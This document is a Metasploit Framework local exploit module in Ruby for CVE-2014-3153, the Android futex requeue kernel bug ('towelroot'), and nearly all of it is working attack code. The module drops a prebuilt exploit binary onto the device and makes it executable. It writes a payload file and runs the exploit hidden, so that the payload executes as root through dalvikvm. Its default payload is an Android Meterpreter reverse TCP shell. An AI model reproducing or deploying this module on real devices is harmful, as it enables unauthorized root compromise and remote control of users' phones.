Android Futex Requeue Kernel Exploit

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
require 'rex'  
  
class Metasploit4 < Msf::Exploit::Local  
Rank = ExcellentRanking  
  
include Msf::Post::File  
include Msf::Post::Common  
  
def initialize(info={})  
super( update_info( info, {  
'Name' => 'Android futex requeue kernel exploit',  
'Description' => %q{  
This module exploits a bug in futex_requeue in the linux kernel.  
Any android phone with a kernel built before June 2014 should be vulnerable.   
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Pinkie Pie', #discovery   
'geohot', #towelroot  
'timwr' #metasploit module  
],  
'References' =>  
[  
[ 'CVE', '2014-3153' ],  
[ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],  
[ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ],  
],  
'SessionTypes' => [ 'meterpreter' ],  
'Platform' => 'android',  
'Targets' => [[ 'Automatic', { }]],  
'Arch' => ARCH_DALVIK,  
'DefaultOptions' =>  
{  
'PAYLOAD' => 'android/meterpreter/reverse_tcp',  
},  
'DefaultTarget' => 0  
}  
))  
  
register_options([  
OptString.new("WritableDir", [ true, "Temporary directory to write files", "/data/local/tmp/" ]),  
], self.class)  
end  
  
def put_local_file(remotefile)  
localfile = File.join( Msf::Config.data_directory, "exploits", "CVE-2014-3153.elf" )  
data = File.read(localfile, {:mode => 'rb'})  
write_file(remotefile, data)  
end  
  
def exploit  
workingdir = session.fs.dir.getwd  
exploitfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"  
payloadfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"  
  
put_local_file(exploitfile)  
cmd_exec('/system/bin/chmod 700 ' + exploitfile)  
write_file(payloadfile, payload.raw)  
  
tmpdir = datastore['WritableDir']  
rootclassdir = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}"  
rootpayload = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}.jar"  
  
rootcmd = " mkdir #{rootclassdir} && "  
rootcmd += "cd #{rootclassdir} && "  
rootcmd += "cp " + payloadfile + " #{rootpayload} && "  
rootcmd += "chmod 766 #{rootpayload} && "  
rootcmd += "dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload"  
  
process = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true})  
process.channel.read  
end  
  
end  
  
`